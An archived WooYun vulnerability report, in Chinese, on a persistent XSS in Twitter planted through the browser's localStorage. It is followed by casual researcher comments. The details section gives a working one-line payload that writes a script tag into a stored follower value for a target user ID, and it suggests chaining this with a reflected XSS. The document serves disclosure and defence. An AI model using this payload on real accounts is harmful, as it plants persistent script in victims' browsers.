twitter的localStorage的xss

漏洞概要

缺陷编号:WooYun-2011-03075

漏洞标题:twitter的localStorage的xss

相关厂商:twitter

漏洞作者:呆子不开口

提交时间:2011-10-22 00:27

公开时间:2011-10-22 10:23

漏洞类型:XSS 跨站脚本攻击

危害等级:低

自评Rank:1

漏洞状态:未联系到厂商或者厂商积极忽略

Tags标签:

漏洞详情

披露状态:

2011-10-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

很鸡肋,但挺有意思,我使用你的电脑后就可以给你种个xss

详细说明:

知道目标用户的id,在当前域执行下jslocalStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');即可,配合反射xss效果更佳

漏洞证明:

修复方案:

对localStorage里的数据进行过滤验证后再放入html中

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)

评价

  1. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    这不就是传说中的rootkit后门么

  2. 2010-01-01 00:00 rayh4c 白帽子 | Rank:158 漏洞数:23)

    爽啊爽 哈哈 这种实例忒爽了

  3. 2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)

    请赞助作者5块钱

  4. 2010-01-01 00:00 瞌睡龙 白帽子 | Rank:44 漏洞数:5)

    代表twitter奖励lz路边哈密瓜一个,速来认领 🙂

  5. 2010-01-01 00:00 GaRY 白帽子 | Rank:24 漏洞数:3)

    这个不错,可以加精

  6. 2010-01-01 00:00 呆子不开口 白帽子 | Rank:246 漏洞数:30)

    5块钱够干什么的呀,瞌睡龙快过来帮我含住,那5块钱给你了。还有,twitter这个单位是做什么的,怎么联系不到,在海淀没有分公司么

  7. 2010-01-01 00:00 霍家二爷 白帽子 | Rank:63 漏洞数:7)

    这个不错

  8. 2010-01-01 00:00 possible 白帽子 | Rank:296 漏洞数:31)

    大牛发的 都是这么精华